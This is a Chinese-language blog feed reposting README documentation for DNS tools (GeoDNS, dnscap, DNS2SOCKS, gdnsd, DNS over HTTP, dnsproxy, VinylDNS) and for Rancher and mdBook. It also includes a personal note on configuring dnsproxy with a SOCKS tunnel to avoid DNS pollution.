The target will have the current zone name appended if it's not a FQDN (since v2.2.0).

MX

MX records support a weight similar to A records to indicate how often the particular record should be returned.
The preference is the MX record preference returned to the client.
{ "mx": "foo.example.com" }
{ "mx": "foo.example.com", "weight": 100 }
{ "mx": "foo.example.com", "weight": 100, "preference": 10 }
weight and preference are optional.

NS

NS records for the label, use it on the top level empty label ("") to specify the nameservers for the domain.
[ "ns1.example.com", "ns2.example.com" ]
There's an alternate legacy syntax that has space for glue records (IPv4 addresses), but in GeoDNS the values in the object are ignored so the list syntax above is recommended.
{ "ns1.example.net.": null, "ns2.example.net.": null }

TXT

Simple syntax
"Some text"
Or with weights
{ "txt": "Some text", "weight": 10 }

SPF

An SPF record is semantically identical to a TXT record with the exception that the label is set to 'spf'. An example of an spf record with weights:
{ "spf": "v=spf1 ~all]", "weight": 1 }
An spf record is typically at the root of a zone, and a label can have an array of SPF records, e.g
"spf": [ { "spf": "v=spf1 ~all", "weight": 1 } , "spf": "v=spf1 10.0.0.1", "weight": 100]

SRV

An SRV record has four components: the weight, priority, port and target. The keys for these are "srv_weight", "priority", "target" and "port". Note the difference between srv_weight (the weight key for the SRV qtype) and "weight".
An example srv record definition for the _sip._tcp service:
"_sip._tcp": {
"srv": [ { "port": 5060, "srv_weight": 100, "priority": 10, "target": "sipserver.example.com."} ]
},
Much like MX records, SRV records can have multiple targets, eg:
"_http._tcp": {
"srv": [
{ "port": 80, "srv_weight": 10, "priority": 10, "target": "www.example.com."},
{ "port": 8080, "srv_weight": 10, "priority": 20, "target": "www2.example.com."}
]
},
from https://github.com/abh/geodns

捕捉dns流量的工具-dnscap

$
0
0
Network capture utility designed specifically for DNS traffic 

Build Status Coverity Scan Build Status Total alerts
dnscap is a network capture utility designed specifically for DNS traffic. It produces binary data in pcap(3) and other format. This utility is similar to tcpdump(1), but has a number of features tailored to DNS transactions and protocol options. DNS-OARC uses dnscap for DITL data collections.
Some of its features include:
  • Understands both IPv4 and IPv6
  • Captures UDP, TCP, and IP fragments.
  • Collect only queries, responses, or both (-s option)
  • Collect for only certain source/destination addresses (-a -z -A -Z options)
  • Periodically creates new pcap files (-t option)
  • Spawns an upload script after closing a pcap file (-k option)
  • Will start and stop collecting at specific times (-B -E options)
More information may be found here:
Issues should be reported here:
Mailinglist:

Dependencies

dnscap requires a couple of libraries beside a normal C compiling environment with autoconf, automake, libtool and pkgconfig.
dnscap has a non-optional dependency on the PCAP library and optional dependencies on LDNS. BIND library libbindis considered optional but it is needed under OpenBSD for various arpa/nameser* include headers, see Linking with libbind.
To install the dependencies under Debian/Ubuntu:
apt-get install -y libpcap-dev libldns-dev libbind-dev zlib1g-dev libyaml-perl libssl-dev
To install the dependencies under CentOS (with EPEL enabled):
yum install -y libpcap-devel ldns-devel openssl-devel bind-devel zlib-devel perl-YAML
For the following OS you will need to install some of the dependencies from source or Ports, these instructions are not included.
To install some of the dependencies under FreeBSD 10+ using pkg:
pkg install -y libpcap ldns p5-YAML openssl-devel
To install some of the dependencies under OpenBSD 5+ using pkg_add:
pkg_add libldns p5-YAML
NOTE: It is recommended to install the PCAP library from source/ports on OpenBSD since the bundled version is an older and modified version.

Dependencies for cryptopant.so plugin

For this plugin a library call cryptopANT is required and the original can be found here: https://ant.isi.edu/software/cryptopANT/index.html .
For DNS-OARC packages we build our own fork, with slight modifications to conform across distributions, of this library which is included in the same package repository as dnscap. The modifications and packaging files can be found here: https://github.com/DNS-OARC/cryptopANT .

Building from source tarball

The source tarball from DNS-OARC comes prepared with configure:
tar zxvf dnscap-version.tar.gz
cd dnscap-version
./configure [options]
make
make install

Building from Git repository

If you are building dnscap from it's Git repository you will first need to initiate the Git submodules that exists and later create autoconf/automake files, this will require a build environment with autoconf, automake, libtool and pkg-config to be installed.
git clone https://github.com/DNS-OARC/dnscap.git
cd dnscap
git submodule update --init
./autogen.sh
./configure [options]
make
make install

Linking with libbind

If you plan to use dnscap's -x/-X features, then you might need to have libbind installed. These features use functions such as ns_parserr(). On some systems these functions will be found in libresolv. If not, then you might need to install libbind. I suggest first building dnscap on your system as-is, then run
$ ./dnscap -x foo
If you see an error, install libbind either from your OS package system or by downloading the source from http://ftp.isc.org/isc/libbind/6.0/ .

64-bit libraries

If you need to link against 64-bit libraries found in non-standard locations, provide the location by setting LDFLAGS before running configure:
$ env LDFLAGS=-L/usr/lib64 ./configure

OpenBSD

For OpenBSD you probably installed libpcap and libbind in /usr/local so you will need to tell configure that and libbind might install it's libraries and header files in a subdirectory:
$ env CFLAGS="-I/usr/local/include -I/usr/local/include/bind" \
LDFLAGS="-L/usr/local/lib -L/usr/local/lib/bind" \
./configure

FreeBSD

If you've installed libbind for -x/-X then it probably went into /usr/local and you'll need to tell configure how to find it:
$ env CFLAGS="-I/usr/local/include -I/usr/local/include/bind" \
LDFLAGS="-L/usr/local/lib -L/usr/local/lib/bind" \
./configure
Also note that we have observed significant memory leaks on FreeBSD (7.2) when using -x/-X. To rectify:
  1. cd /usr/ports/dns/libbind
  2. make config
  3. de-select "Compile with thread support"
  4. reinstall the libbind port
  5. recompile and install dnscap

Plugins

dnscap comes bundled with a set of plugins, see -P option.
  • anonaes128.so: Anonymize IP addresses using AES128
  • anonmask.so: Pseudo-anonymize IP addresses by masking them
  • cryptopan.so: Anonymize IP addresses using an extension to Crypto-PAn (College of Computing, Georgia Tech) made by David Stott (Lucent)
  • cryptopant.so: Anonymize IP addresses using cryptopANT, a different implementation of Crypto-PAn made by the ANT project at USC/ISI
  • ipcrypt.so: Anonymize IP addresses using ipcrypt create by Jean-Philippe Aumasson
  • pcapdump.so: Dump DNS into a PCAP with some filtering options
  • royparse.so: Splits a PCAP into two streams; queries in PCAP format and responses in ASCII format
  • rssm.so: Root Server Scaling Measurement plugin, see it's README.md for more information
  • rzkeychange.so: RFC8145 key tag signal collection and reporting plugin
  • txtout.so: Dump DNS as one-line text
There is also a template plugin in the source repository to help others develop new plugins.

CBOR DNS Stream Format

This is an experimental format for representing DNS information in CBOR with the goals to:
  • Be able to stream the information
  • Support incomplete, broken and/or invalid DNS
  • Have close to no data quality and signature degradation
  • Support additional non-DNS meta data (such as ICMP/TCP attributes)
Read CBOR_DNS_STREAM.md for more information.
To enable this output please follow the instructions below for Enabling CBOR Output, note that this only requires Tinycbor.

Outputting to CBOR DNS Stream (CDS)

To output to the CDS format you tell dnscap to write to a file and set the format to CDS. CDS is a stream of CBOR objects and you can control how many objects are kept in memory until flushed to the file by setting cds_cbor_size, note that this is bytes of memory and not number of objects. When it reaches this limit it will write the output and start on a new file. Read dnscap's man page for all CDS extended options.
src/dnscap [...] -w  -F cds [ -o cds_cbor_size= ]

CBOR

There is experimental support for CBOR output using LDNS and Tinycbor with a data structure described in the DNS-in-JSON draft.

Enabling CBOR Output

To enable the CBOR output support you will need to install it's dependencies before running configure, LDNS exists for most distributions but Tinycbor is new so you need to download and compile it, you do not necessary need to install it as shown in the example below.
git clone https://github.com/DNS-OARC/dnscap.git
cd dnscap
git submodule update --init
git clone https://github.com/01org/tinycbor.git
cd tinycbor
git checkout v0.4.2
make
cd ..
sh autogen.sh
CFLAGS="-I$PWD/tinycbor/src" LDFLAGS="-L$PWD/tinycbor/lib" LIBS="-ltinycbor" ./configure
make
NOTE: Paths in CFLAGS and LDFLAGS must be absolute.

CBOR to JSON

Tinycbor comes with a tool to convert CBOR to JSON, check bin/cbordump -h in the Tinycbor directory after having compiled it.

Outputting to CBOR

To output to the CBOR format you tell dnscap to write to a file and set the format to CBOR. Since Tinycbor constructs everything in memory there is a limit and when it is reached it will write the output and start on a new file. You can control the number of bytes with the extended option cbor_chunk_size.
src/dnscap [...] -w  -F cbor [ -o cbor_chunk_size= ]

Additional attributes

There is currently an additional attribute added to the CBOR object which contains the IP information as following:
"ip": [
,
"",

"",

]
Example:
"ip": [
17,
"127.0.0.1",
34856,
"127.0.0.1",
53
]
from https://github.com/DNS-OARC/dnscap

用本地的socks代理服务器程序转发dns query的工具-dns2socks

$
0
0
DNS2SOCKS is a command line utility running to forward DNS requests to a
DNS server via a SOCKS tunnel
.

I know that this is no new idea, but let me explain why I've coded this:
Windows supports using a SOCKS proxy server for Internet connections, but it
only uses the SOCKS proxy server for the webpages and not for the DNS requests. I
found several articles in the Internet referring this issue. There seem
to be tools that do exactly the same thing as DNS2SOCKS, but they either
need a scripting interpreter or are not available for downloading anymore.

So I've coded my own tool. It's very(!) simple and doesn't use any
sophisticated technology.

To use it, just configure your OS to use the DNS server on the local
IP address 127.0.0.1 (IPv4) and/or ::1 (IPv6). On Windows: open the
properties of your network adapter. For IPv4 open the properties of
"Internet Protocol Version 4 (TCP/IPv4)", select "Use the following DNS
server addresses" and enter "127.0.0.1" for the "Preferred DNS server".
For IPv6 open the properties of "Internet Protocol Version 6
(TCP/IPv6)", select "Use the following DNS server addresses" and enter
"::1" for the "Preferred DNS server".

After that run your SOCKS server (must support SOCKS protocol version 5,
for example Tor) and start DNS2SOCKS using the correct command line
switches (see below). Now all DNS requests of your OS (triggered by any
application) run through DNS2SOCKS and your SOCKS server.

You can additionally configure Windows to use your SOCKS server for
Internet connections (for the content, not DNS). To do this open the
"Internet Options" of the control panel, select the tab "Connections" and
click on "LAN settings". Check "Use a proxy server for your LAN..." and
click on "Advanced". Enter your SOCKS server address and port in the field
"Socks". Now Internet Explorer and other tools using these settings get
web pages via your SOCKS server. This works with most browsers. However,
you should rely on IPv4 for Tor here as (most?) Tor exit servers currently
don't support IPv6 (see below).

The command line call for DNS2SOCKS has the following format:

DNS2SOCKS [/?] [/d] [/q] [l[a]:FilePath] [/u:User /p:Password]
[Socks5ServIP[:Port]] [DNSServIPorName[:Port]] [ListenIP[:Port]]

/? or any invalid parameter outputs the usage text
/d disables the cache
/q disables the text output to the console
/l:FilePath creates a new log file "FilePath"
/la:FilePath creates a new log file "FilePath" or appends to the file if
it already exists
/u:User user name if your SOCKS server uses user/password
authentication
/p:Password password if your SOCKS server uses user/password
authentication

The default values for the addresses and ports are (in case you don't
specify the command line arguments):
Default Socks5ServerIP:Port = 127.0.0.1:9050
Default DNSServerIPorName:Port = 213.73.91.35:53
Default ListenIP:Port = 127.0.0.1:53

So the SOCKS server runs locally on the TCP port 9050 (Tor's default port;
attention: for Tor Browser Bundle you must change it to 9150). The used
DNS server is 213.73.91.35 (dnscache.berlin.ccc.de). The DNS server must
support TCP on port 53 as Tor doesn't support UDP via SOCKS. DNS2SOCKS
listens on the UDP port 53 of 127.0.0.1 (only locally) - change this to
0.0.0.0 for listening on all available local IPv4 addresses.

You can launch DNS2SOCKS several times with different settings, for
example to listen on IPv6 addresses additionally. To specify an IPv6
address, use the typical format like 1234:5678::1234. To add the port
number please embed the IP address in square brackets and add the port
number separated by the colon, e.g. [::1]:1024

Hint: In the default configuration Tor only listens on 127.0.0.1 for
incoming requests. You can change this in Tor's configuration file using
the following line
SocksListenAddress 192.168.1.1
In this example it listens on 192.168.1.1
Currently Tor doesn't support IPv6 addresses for listening.

Please note that Tor/Vidalia will output warnings that your application
doesn't resolve host names via Tor. This is not true, but Tor can't know
this as Tor doesn't recognize the tunneled DNS requests. DNS2SOCKS
directly uses the IP address of the DNS server while using SOCKS and also
your application will do this as it gets the IP address from DNS2SOCKS.
Tor expects getting the host names instead of IP addresses and thus
outputs these warnings.

However, instead of an IP address you can also specify the DNS server's
name instead of its IP address, e.g.
DNS2SOCKS 127.0.0.1 dnscache.berlin.ccc.de ::1
Specifying an IPv6 address for the DNS server is also supported by
DNS2SOCKS, but it's not recommended to do this as your current Tor exit
server would need to support IPv6, which it typically doesn't. So it's
better to specify the DNS server name as the exit server can choose IPv4
or IPv6 automatically this way. Directly specifying an IPv4 address might
be a bit faster; currently all Tor exit servers should support this.

As DNS requests running through the SOCKS tunnel are very slow, the
calling application might time out before it gets the answer - in this
case just try it again (press "reload" in the browser).

The output of DNS2SOCKS is very simple. On each new request it outputs
the requested name prefixed by the current number of entries in the
cache (just an increasing number in case the cache is disabled) and a time
stamp. DNS2SOCKS caches DNS requests, so the next time it can serve the
answer faster. The cache is a very simple list. There is no sophisticated
hash algorithm or something like that for the cache and DNS2SOCKS doesn't
really interpret the DNS requests and answers - it just forwards them.

DNS2SOCKS runs as long as you don't manually stop it.
You can also run several instances of DNS2SOCKS at the same time when
using different local ports or IPv4 and IPv6 at the same time, e.g. use a
batch file and Window's Start command to do this.

If you think that DNS2SOCKS is not the right tool for you, but you want
to route all network traffic of a specific Windows application through a
SOCKS tunnel, you might want to try my tool InjectSOCK



Now about some technical details:
DNS2SOCKS listens on the local UDP and TCP port you specify. In case it
gets a request it first searches the cache for an identical request.
In case of a cache miss or expiration of the entry, the tool creates a new
thread for resolving the request. The new thread opens a TCP connection to
the SOCKS server and forwards the DNS request. This time the DNS request
always runs on TCP as Tor currently doesn't support UDP via SOCKS. So the
DNS server must support TCP. When the thread finally gets the answer, it
forwards it via UDP or TCP to the requesting client and stores it in the
cache. DNS2SOCKS supports user/password authentication (method 0x02) for
SOCKS.

I've tried to comment the source code as good as possible and you can
compile it using Visual C++ 2010 Express Edition (or any other edition).
I've also tested it on Knoppix and Damn Small Linux and compiled it via
gcc -pthread -Wall -O2 -o DNS2SOCKS DNS2SOCKS.c
It should also run on other *nix variants; maybe with tiny modifications.

Have fun using this software!

from https://github.com/qiuzi/dns2socks

权威dns解析服务器程序-gdnsd

$
0
0
Authoritative DNS Server -- 

Overview

gdnsd is an Authoritative-only DNS server. The initial g stands for Geographic, as gdnsd offers a plugin system for geographic (or other sorts of) balancing, redirection, and service-state-conscious failover. The plugin system can also do things like weighted address/cname records. If you don't care about these features you can ignore them :).
gdnsd is written in C, and uses pthreads with libev and liburcu to attain very high performance, low latency service. It does not offer any form of caching or recursive service, and does not support DNSSEC. There's a strong focus on making the code efficient, lean, and resilient. The code has a decent regression testsuite with full branch coverage on the core packet parsing and generation code, and some scripted QA tools for e.g. valgrind validation, clang-analyzer, etc.
The geographically-aware features also support the EDNS Client Subnet spec from RFC 7871 for receiving more-precise network location information from intermediate shared caches.

Resources

Project site: https://gdnsd.org/
The code is hosted at Github: https://github.com/gdnsd/gdnsd/
Google Group for discussion: https://groups.google.com/forum/#!forum/gdnsd
See the INSTALL file for details on prerequisites and build procedure for working from the source tree or a source tarball.
The documentation is included in the source tree in POD format and installed as manpages and textfiles on installation.

DNSoverHTTP (包括服务器端和客户端)

$
0
0

a source code for DNS over HTTP implementation.

Introduction

This is proxy_dns, a way to tunnel DNS inside HTTP. It provides two things:
  1. a FastCGI endpoint that sits between a web server (we use nginx, but Apache would also work) and a DNS server (we use BIND, but Unbound would also work.)
  2. a DNS proxy server that is the target of an /etc/resolv.conf (on UNIX) or DHCP "name server" declaration; it resolves DNS by using upstream HTTP.
The great advantage to this approach is that HTTP usually makes it through even the worst coffee shop or hotel room firewalls, since commerce may be at stake. We also benefit from HTTP's persistent TCP connection pool concept, which DNS on TCP/53 does not have. Lastly, HTTPS will work, giving nominal privacy.
This software is as yet unpackaged, but is portable to FreeBSD 10 and Debian 7 and very probably other BSD-similar and Linux-similar systems. This software is written entirely in C and has been compiled with GCC and Clang with "full warnings" enabled.

Construction

More or less, do this:
(cd proxy_dns_gw; make)
(cd proxy_dns_fcgi; make)
It is possible that the Makefile will need tweaking, since -lresolv is required on Linux but is both not required and will not work on BSD due to differences in their "libc" implementations.

Server Installation

The proxy_dns_fcgi service currently just follows /etc/resolv.conf, so you will need a working name server configuration on your web server. The server should be reachable by UDP and TCP, and you should have a clear ICMP path to it, as well as full MTU (1500 octets or larger) and the ability to receive fragmented UDP (to make EDNS0 usable.)
  1. place the proxy_dns_fcgi executable somewhere that nginx can reach it.
  2. start this executable and look for a /tmp/proxy_dns_fcgi.sock file.
  3. edit nginx.conf to contain something equivilent to the following:
     location /proxy_dns {
    root /;
    fastcgi_pass unix:/tmp/proxy_dns_fcgi.sock;
    include fastcgi_params;
    }
    or, edit httpd.conf to contain something equivilent to the following:
     Listen 24.104.150.237:80
    Listen [2001:559:8000::B]:80

    LoadModule proxy_module libexec/apache24/mod_proxy.so
    LoadModule proxy_fcgi_module libexec/apache24/mod_proxy_fcgi.so


    ServerName proxy-dns.tisf.net
    ProxyPass /proxy_dns \
    unix:/tmp/proxy_dns_fcgi.sock|fcgi://localhost/ \
    enablereuse=on

  4. reload the configuration of, or restart, your nginx server.
  5. test the integration by visiting the /proxy_dns page with a browser.

Client Installation

The proxy_dns_gw service must be told what IP address to listen on for DNS (noting, it will open both a UDP and a TCP listener on that address), so if you want it to listen on both ::1 and 127.0.0.1, you will have to start two listeners, by giving proxy_dns_gw two arguments "-l ::1" and "-l 127.0.0.1".
It must also be told where to connect for its DNS proxy service. If your FastCGI service (see previous section) is running on a web server proxy-dns.vix.su, then you will have to specify "-s http://proxy-dns.vix.su" (or "-s https://proxy-dns.vix.su" if you are using TLS to protect your HTTP.)
  1. place the proxy_dns_gw executable somewhere that will survive a reboot.
  2. start this executable at least once with appropriate "-s" and "-l" options.
  3. use "netstat -an" to determine whether it has opened listener sockets.

Testing

Make sure you have a working "dig" command. If you started your client side dns_proxy service on 127.0.0.1, then you should be able to say:
dig @127.0.0.1 www.vix.su aaaa
and get a result back. You can watch this simultaneously on the server side dns_proxy by running a command similar to this:
tail -f /var/log/nginx-access.log

Protocol

The protocol used by the dns_proxy service is alarmingly simple. There's no JSON or XML encoding; the DNS query and response are sent as raw binary via the "libcurl" library on the client side and the "libfcgi" library on the server side. The URI is always "/proxy_dns", which means, it contains no parameters. The result is always marked non-cacheable. The request is always POST. If you send the fcgi server a GET, it will return a human-readable page showing its web server environment. There is one new HTTP header:
Proxy-DNS-Transport: xyz
where xyz is either UDP or TCP, which is the client's indication of how it received the underlying DNS query, and which the server will use when sending the query to the far-end DNS server. This means if a stub DNS client asks for TCP, then that's what the far-end DNS server will see, and likewise for UDP.
The proxy service does not interpret the DNS query or response in any way. It could be DNS, EDNS, or something not yet invented at the time of this writing. The only requirement is that each request message solicits exactly one response message. If anything at all goes wrong with the proxy service, the stub client will hear a DNS SERVFAIL response.

To Do List

This software was written in C in order to be small, self contained, and portable to Windows and Mac/OS some day. The protocol was designed to be very simple in order that higher-performing implementations could be written for high availability production servers. Still, shortcuts were taken, and should be addressed:
  1. threads on the proxy_dns_fcgi side are a problem. should use "libevent".
  2. select() on the proxy_dns_gw side is a problem. should use "libcurl" more.

Authors

This software was conceived and drafted by Paul Vixie during WIDE-2015-03, and is hereby placed into the public domain, and also placed into the care of BII, a Beijing-based non-profit Internet technology company.
Note that there is a follow-up work using Golang to implement DNS over HTTP, Please visit https://github.com/BII-Lab/DNSoverHTTPinGO for more information.

from https://github.com/BII-Lab/DNSoverHTTP

利用作者ARwMq9b6写的dnsproxy进行dns查询,确实能避免dns污染

$
0
0
在本地机器mac上。
mkdir dnsproxy-by-ARwMq9b6
cd dnsproxy-by-ARwMq9b6
wget https://github.com/ARwMq9b6/dnsproxy/releases/download/v0.1.1/dnsproxy-v0.1.1-darwin-amd64.tar.gz
tar zxvf dnsproxy-v0.1.1-darwin-amd64.tar.gz


yudeMacBook-Air:dnsproxy-by-ARwMq9b6 brite$ ls
china_domain_list.txtconfig.tomldnsproxy-v0.1.1-darwin-amd64.tar.gz
china_ip_list.txtdnsproxygfw_domain_list.txt
yudeMacBook-Air:dnsproxy-by-ARwMq9b6 brite$ cat config.toml
gfw_list = "./gfw_domain_list.txt"
china_list = "./china_domain_list.txt"
china_ip_list = "./china_ip_list.txt"

###########
# DNS 服务器
###########
[dns]
listen = ":53"  # 将要开启的本地 DNS 服务器的绑定地址

# 国内 DNS 服务器信息
[dns.obedient]
nameserver = "119.29.29.29:53"  # DNS 服务器地址
net = "udp"  # 可选值: udp | tcp | tcp-tls

# 国外 DNS 服务器信息
# - enable_dns_over_https == true 时:
#       `nameserver` 会默认为 https://dns.google.com/resolve?
#       `proxy` 可以是 http, socks5 等代理
# - enable_dns_over_https == false 时:
#       `proxy` 不能为 http 代理
#
# 开启 enable_dns_over_https 后 DNS 查询速度会较慢
[dns.abroad]
enable_dns_over_https = false

nameserver = "8.8.8.8:53"  # DNS 服务器地址
proxy = "socks5://127.0.0.1:7071"

###########
# 代理服务器
###########
[proxy]
listen = ":1480"  # 将要开启的本地代理服务器的绑定地址

proxy_server = "socks5://127.0.0.1:7071"  # 已有的 http 或 socks5 代理,非中国大陆网站流量将会被转发到此代理上
proxy_server_external_ip = ""  # 代理服务器的公网 IP
                               # 是为可选项,用于提升代理服务器的 DNS 查询质量
                               # 通过代理上网并访问 `https://tools.keycdn.com/geo` 之类的网站可看到公网 IP
yudeMacBook-Air:dnsproxy-by-ARwMq9b6 brite$ sudo ./dnsproxy -c config.toml

Password:

看到配置文件config.toml里面的"socks5://127.0.0.1:7071" 了吗?意思就是要使用本地机器上运行的某个socks5代理服务器程序(比如ssh tunnel.建议用ssh tunnel,它的加密连接的程度明显比ss强),转发dns请求到8.8.8.8:53;因为是通过加密的代理转发dns请求,这样就不会受到dns污染了。



实际应用例子:
以wireguard为例。
我们在搭建好wg的服务器端和客户端后,我们在客户机器mac上运行:
sudo wg-quick up wg0 
运行此命令后,此命令会把客户机器mac的dns server地址改为8.8.8.8;此时确实可用这个wireguard VPN翻墙。但是维持不了多久,访问某个网址时,就会显示“正在解析主机名”,好长时间都解析不成功,因为本地机器直接去连接8.8.8.8,受到了gfw的干扰,连接失败,所以无法解析域名。那么怎么办呢?我们首先运行命令:
sudo networksetup -setdnsservers "Wi-Fi" Empty && sudo networksetup -setdnsservers "Wi-Fi" 127.0.0.1 ,把客户机器mac的dns server地址改为127.0.0.1,然后
cd ~/dnsproxy-by-ARwMq9b6 && ./dnsproxy -c config.toml

不要关闭此terminal.然后,dns污染的问题就解决了。

这个程序比http://www.briten.info/2019/07/socksdns-query-dns2socks.html 里面说的那个dns2socks好用多了。那个dns2socks好像改变不了参数,我测试它,失败。
--------

这个程序也只能维持一个小时能翻墙。看样子非得自建一个'dns over https' dns server才是王道。 

docker容器管理平台-rancher

$
0
0
Complete container management platform 
Rancher is an open source project that provides a container management platform built for organizations that deploy containers in production. Rancher makes it easy to run Kubernetes everywhere, meet IT requirements, and empower DevOps teams.
Looking for Rancher 1.6.x info? Click here

Latest Release

  • Latest - v2.2.4 - rancher/rancher:latest - Read the full release notes.
  • Stable - v2.2.4 - rancher/rancher:stable - Read the full release notes.
To get automated notifications of our latest release, you can watch the announcements category in our forums, or subscribe to the RSS feed https://forums.rancher.com/c/announcements.rss.

Quick Start

sudo docker run -d --restart=unless-stopped -p 80:80 -p 443:443 rancher/rancher
Open your browser to https://localhost

Installation

Rancher can be deployed in either a single node or multi-node setup. Please refer to the following for guides on how to get Rancher up and running.
No internet access? Refer to our Air Gap Installation for instructions on how to use your own private registry to install Rancher.

Minimum Requirements

  • Operating Systems
    • Ubuntu 16.04 (64-bit)
    • Red Hat Enterprise Linux 7.5 (64-bit)
    • RancherOS 1.4 (64-bit)
  • Hardware
    • 4 GB of Memory
  • Software
    • Docker v1.12.6, 1.13.1, 17.03.2

Using Rancher

To learn more about using Rancher, please refer to our Rancher Documentation.

Source Code

This repo is a meta-repo used for packaging and contains the majority of rancher codebase. Rancher does include other Rancher projects including:
Rancher also includes other open source llbraries and projects. Please go here to view the entire list.

Support, Discussion, and Community

If you need any help with Rancher or RancherOS, please join us at either our Rancher forums#rancher IRC channel or Slack where most of our team hangs out at.
Please submit any Rancher bugs, issues, and feature requests to rancher/rancher.
Please submit any RancherOS bugs, issues, and feature requests to rancher/os.
For security issues, please email security@rancher.com instead of posting a public issue in GitHub. You may (but are not required to) use the GPG key located on Keybase.

dns记录查询网站dnsrecords.io的源码

从零开始用Rust写一个DNS Server 指南

$
0
0
A guide to writing a DNS Server from scratch in Rust.

Building a DNS server in Rust

The internet has a rich conceptual foundation, with many exciting ideas that enable it to function as we know it. One of the really cool ones is DNS. Before it was invented, everyone on the internet - which admittedly wasn't that many at that stage - relied on a shared file called HOSTS.TXT, maintained by the Stanford Research Institute. This file was synchronized manually through FTP, and as the number of hosts grew, so did the rate of change and the unfeasibility of the system. In 1983, Paul Mockapetris set out to find a long term solution to the problem and went on to design and implement DNS. It's a testament to his genius that his creation has been able to scale from a few thousand computers to the Internet as we know it today.
With the combined goal of gaining a deep understanding of DNS, of doing something interesting with Rust, and of scratching some of my own itches, I originally set out to implement my own DNS server. This document is not a truthful chronicle of that journey, but rather an idealized version of it, without all the detours I ended up taking. We'll gradually implement a full DNS server, starting from first principles.

‘dns记录’管理平台-vinyldns

$
0
0
Vendor agnostic DNS front-end for streamlining DNS operations and enabling self-service for your DNS infrastructure
VinylDNS is a vendor agnostic front-end for enabling self-service DNS and streamlining DNS operations. VinylDNS manages millions of DNS records supporting thousands of engineers in production at Comcast. The platform provides fine-grained access controls, auditing of all changes, a self-service user interface, secure RESTful API, and integration with infrastructure automation tools like Ansible and Terraform. It is designed to integrate with your existing DNS infrastructure, and provides extensibility to fit your installation.
VinylDNS helps secure DNS management via:
  • AWS Sig4 signing of all messages to ensure that the message that was sent was not altered in transit
  • Throttling of DNS updates to rate limit concurrent updates against your DNS systems
  • Encrypting user secrets and TSIG keys at rest and in-transit
  • Recording every change made to DNS records and zones
Integration is simple with first-class language support including:
  • java
  • ruby
  • python
  • go-lang
  • javascript

Table of Contents

Quickstart

Docker images for VinylDNS live on Docker Hub at https://hub.docker.com/u/vinyldns/. To start up a local instance of VinylDNS on your machine with docker:
  1. Ensure that you have docker and docker-compose
  2. Clone the repo: git clone https://github.com/vinyldns/vinyldns.git
  3. Navigate to repo: cd vinyldns
  4. Run .bin/docker-up-vinyldns.sh. This will start up the api at localhost:9000 and the portal at localhost:9001
  5. See Developer Guide for how to load a test DNS zone
  6. To stop the local setup, run ./bin/remove-vinyl-containers.sh.
There exist several clients at https://github.com/vinyldns that can be used to make API requests, using the endpoint http://localhost:9000

Things to try in the portal

  1. View the portal at http://localhost:9001 in a web browser
  2. Login with the credentials testuser and testpassword
  3. Navigate to the groups tab: http://localhost:9001/groups
  4. Click on the New Group button and create a new group, the group id is the uuid in the url after you view the group
  5. View zones you connected to in the zones tab: http://localhost:9001/zones (Note, see Developer Guide for creating a zone)
  6. You will see that some records are preloaded in the zoned already, this is because these records are preloaded in the local docker DNS server and VinylDNS automatically syncs records with the backend DNS server upon zone connection
  7. From here, you can create DNS record sets in the Manage Records tab, and manage zone settings and ACL rules in the Manage Zone tab
  8. To try creating a DNS record, click on the Create Record Set button under Records, Record Type = A, Record Name = my-test-a, TTL = 300, IP Addressess = 1.1.1.1
  9. Click on the Refresh button under Records, you should see your new record created

Other things to note

  1. Upon connecting to a zone for the first time, a zone sync is ran to provide VinylDNS a copy of the records in the zone
  2. Changes made via VinylDNS are made against the DNS backend, you do not need to sync the zone further to push those changes out
  3. If changes to the zone are made outside of VinylDNS, then the zone will have to be re-synced to give VinylDNS a copy of those records
  4. If you wish to modify the url used in the creation process from http://localhost:9000, to say http://vinyldns.yourdomain.com:9000, you can modify the bin/.env file before execution.
  5. A similar docker/.env can be modified to change the default ports for the Portal and API. You must also modify their config files with the new port: https://www.vinyldns.io/operator/config-portal & https://www.vinyldns.io/operator/config-api

Code of Conduct

This project and everyone participating in it are governed by the VinylDNS Code Of Conduct. By participating, you agree to this Code. Please report any violations to the code of conduct to vinyldns-core@googlegroups.com.

Developer Guide

See DEVELOPER_GUIDE.md for instructions on setting up VinylDNS locally.

from https://github.com/vinyldns/vinyldns

用rust实现的电子书生成器-mdBook

$
0
0
Create book from markdown files. Like Gitbook but implemented in Rust.
Linux / OS X
Windows
 
mdBook is a utility to create modern online books from Markdown files.

What does it look like?

The User Guide for mdBook has been written in Markdown and is using mdBook to generate the online book-like website you can read. The documentation uses the latest version on GitHub and showcases the available features.

Installation

There are multiple ways to install mdBook.
  1. Binaries
    Binaries are available for download here. Make sure to put the path to the binary into your PATH.
  2. From Crates.io
    This requires at least Rust 1.34 and Cargo to be installed. Once you have installed Rust, type the following in the terminal:
    cargo install mdbook
    This will download and compile mdBook for you, the only thing left to do is to add the Cargo bin directory to your PATH.
    Note for automatic deployment
    If you are using a script to do automatic deployments using Travis or another CI server, we recommend that you specify a semver version range for mdBook when you install it through your script!
    This will constrain the server to install the latest non-breaking version of mdBook and will prevent your books from failing to build because we released a new version. For example:
    cargo install mdbook --vers "^0.1.0"
  3. From Git
    The version published to crates.io will ever so slightly be behind the version hosted here on GitHub. If you need the latest version you can build the git version of mdBook yourself. Cargo makes this super easy!
    cargo install --git https://github.com/rust-lang-nursery/mdBook.git mdbook
    Again, make sure to add the Cargo bin directory to your PATH.
  4. For Contributions
    If you want to contribute to mdBook you will have to clone the repository on your local machine:
    git clone https://github.com/rust-lang-nursery/mdBook.git
    cd into mdBook/ and run
    cargo build
    The resulting binary can be found in mdBook/target/debug/ under the name mdBook or mdBook.exe.

Usage

mdBook will primarily be used as a command line tool, even though it exposes all its functionality as a Rust crate for integration in other projects.
Here are the main commands you will want to run. For a more exhaustive explanation, check out the User Guide.
  • mdbook init
    The init command will create a directory with the minimal boilerplate to start with.
    book-test/
    ├── book
    └── src
    ├── chapter_1.md
    └── SUMMARY.md
    book and src are both directories. src contains the markdown files that will be used to render the output to the book directory.
    Please, take a look at the CLI docs for more information and some neat tricks.
  • mdbook build
    This is the command you will run to render your book, it reads the SUMMARY.md file to understand the structure of your book, takes the markdown files in the source directory as input and outputs static html pages that you can upload to a server.
  • mdbook watch
    When you run this command, mdbook will watch your markdown files to rebuild the book on every change. This avoids having to come back to the terminal to type mdbook build over and over again.
  • mdbook serve
    Does the same thing as mdbook watch but additionally serves the book at http://localhost:3000 (port is changeable) and reloads the browser when a change occurs.
  • mdbook clean
    Delete directory in which generated book is located.

3rd Party Plugins

